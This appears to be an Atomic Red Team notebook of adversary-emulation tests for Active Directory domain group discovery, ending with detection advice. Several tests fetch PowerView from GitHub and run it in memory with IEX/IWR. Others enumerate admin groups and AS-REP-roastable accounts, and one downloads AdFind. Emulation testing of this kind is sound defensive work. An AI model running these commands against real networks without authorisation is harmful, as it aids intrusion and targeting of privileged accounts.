# T1069.002 - Domain Groups
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility,  <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

## Atomic Tests

### Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 1

### Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
get-ADPrincipalGroupMembership $env:USERNAME | select name
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 2

### Atomic Test #3 - Elevated group enumeration using net group (Domain)Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
net group /domai "Domain Admins"
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 3

### Atomic Test #4 - Find machines where user has local admin access (PowerView)Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 4

### Atomic Test #5 - Find local admins on all machines in domain (PowerView)Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 5

### Atomic Test #6 - Find Local Admins via Group Policy (PowerView)takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName $env:COMPUTERNAME -Verbose
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 6

### Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
When successful, accounts that do not require kerberos pre-auth will be returned

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined.

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually.

```
##### Description: Requires the Active Directory module for powershell to be installed.

##### Check Prereq Commands:
```powershell
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"

```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 7

### Atomic Test #8 - Adfind - Query Active Directory Groups
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"

```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group)
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 8

### Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroupThe following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Get-AdGroup -Filter *
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 9

### Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcherThe following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 10

### Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
When successful, accounts that do not require kerberos pre-auth will be returned.
Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined.

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually.

```
##### Description: Requires the Active Directory module for powershell to be installed.

##### Check Prereq Commands:
```powershell
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"

```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 11 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 11

### Atomic Test #12 - Get-DomainGroupMember with PowerViewUtilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 12

### Atomic Test #13 - Get-DomainGroup with PowerViewUtilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 13

### Atomic Test #14 - Active Directory Enumeration with LDIFDE
Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: PowerShell ActiveDirectory Module must be installed

##### Check Prereq Commands:
```cmd
Try {
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
    exit 0
}
Catch {
    exit 1
}

```
##### Get Prereq Commands:
```cmd
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
  Install-WindowsFeature RSAT-AD-PowerShell
}

```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 14 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
ldifde.exe -f C:\Windows\temp\atomic_ldifde.txt -p subtree
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 14

#### Cleanup: 
```cmd
del C:\Windows\temp\atomic_ldifde.txt
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 14 -Cleanup

### Atomic Test #15 - Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch

##### Check Prereq Commands:
```sh
which ldapsearch

```
##### Get Prereq Commands:
```sh
echo missing ldapsearch command; exit 1

```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 15 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
ldapsearch -H ldap://example.com:389 -x -D user@example.com -w s3CurePssw0rD! -b "CN=Users,DC=example,DC=com" "(objectClass=group)" -s sub -a always -z 1000 dn 
```

In [ ]:
Invoke-AtomicTest T1069.002 -TestNumbers 15

## Detection
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).